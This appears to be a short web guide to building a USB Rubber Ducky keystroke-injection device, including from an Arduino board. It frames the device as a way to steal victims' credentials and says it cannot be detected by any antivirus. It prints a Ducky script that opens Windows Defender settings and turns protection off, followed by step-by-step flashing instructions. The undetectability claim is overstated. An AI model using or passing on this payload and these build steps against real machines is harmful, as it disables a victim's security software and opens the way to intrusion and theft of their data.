USB DUCKY GUIDE BY IMK

USB DUCKY GUIDE BY IMK

🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌™ 🧡✺💚

USB Rubber ducky is an HID device that looks similar to a USB Pen drive. It may be used to inject keystroke into a system, used to hack a system, steal victims essential and credential data can inject payload to the victim’s computers. The main important thing about USB Rubber ducky is that it cannot be detected by any Anti-Virus or Firewall as it acts as an HID device.

A Rubber Ducky USB stick, once plugged into a computer, looks like a normal keyboard. Following a correct and simple programming, it is able to inject a keystroke sequence as if it were a normal user typing through it.

Course On How to make Rubber Ducky



HID Device

HID stands for Human Interface Devices, it includes devices like keyboard, mouse, joystick. which acts as an interface between the computer and human beings. That is why it cannot get detected as the computer thinks its an interface.

Ducky Code:

REM Type Hello World into Windows notepad. Target: Windows 95 and beyond
DELAY 500
GUI r
DELAY 50
STRING c:\windows\notepad.exe
ENTER
DELAY 500
STRING Hello World

USB Rubber Ducky Parts

  • The microSD card: This is a storage device in which all your payloads are saved, so when you attach a device to the victim’s system it will steal data. The keyboard adapter used microSD card to send the payloads.
  • microSD-to-USB adapter: This is a simple plastic Dongle which is used to mount the SD card to machine.
  • mini “keyboard” adapter: This is a silicon chip to insert a micro SD card to it. This is the main part and sends the keystrokes to the computer.

To Make USB rubber ducky from android : 

  • Android mobile must be rooted
  • Kali net hunter installed on the device

In this article, we must be using some other components to create a USB Rubber Ducky at home. 

Material Requirements

  1. Arduino based board
  2. USB connector
  3. Arduino IDE

Step 1: First of all download Arduino IDE from the link, and install the software like any other software you install on windows. 

Step 2: Connect the Arduino board to the computer using the USB connector and open the IDE. 

Step 3: Now from the Payload list choose according to your task. 

Step 4: Convert the code that you have chosen to make executable in Arduino here. 

Script for turning off the Windows Defender 

REM turn off windows defender then clear action center
REM author:geeksforgeeks
REM You take responsibility for any laws you break with this, I simply point out the security flaw
REM start of script
REM let the HID enumerate
DELAY 2000
ESCAPE
DELAY 100
CONTROL ESCAPE
DELAY 100
STRING Windows Defender Settings
ENTER
DELAY 2000
REM why TAB and HOME?
TAB
DELAY 50
REM why TAB and HOME?HOME
DELAY 50
ALT F4
DELAY 3200
REM windows + a = ????
GUI a 
DELAY 500
ENTER
DELAY 100
GUI a

Step 5:In the Arduino IDE creates a new project, by clicking on File–> New project

Step 6: After converting to new code adding to the Arduino IDE, now select the board which you are using. Tools–>Board–>Your board. 

Step 7: Click on the project and choose the port, where Arduino is connected. Tools–>Port–>Your Port. 

Step 8: Now when the board is connected, enter the code or payload you want to work with. 

Step 9: Now verify and compile your code. Sketch–>verify/compile

Step 10: After compiling, upload the code to the Arduino device. 

Whenever you will Connect this board with any computer it works as a USB rubber ducky it executes the payload written.

YOU CAN BUY FROM BELOW SITES

SITE 1

SITE 2

For more= @ITS_ME_KALI

Report Page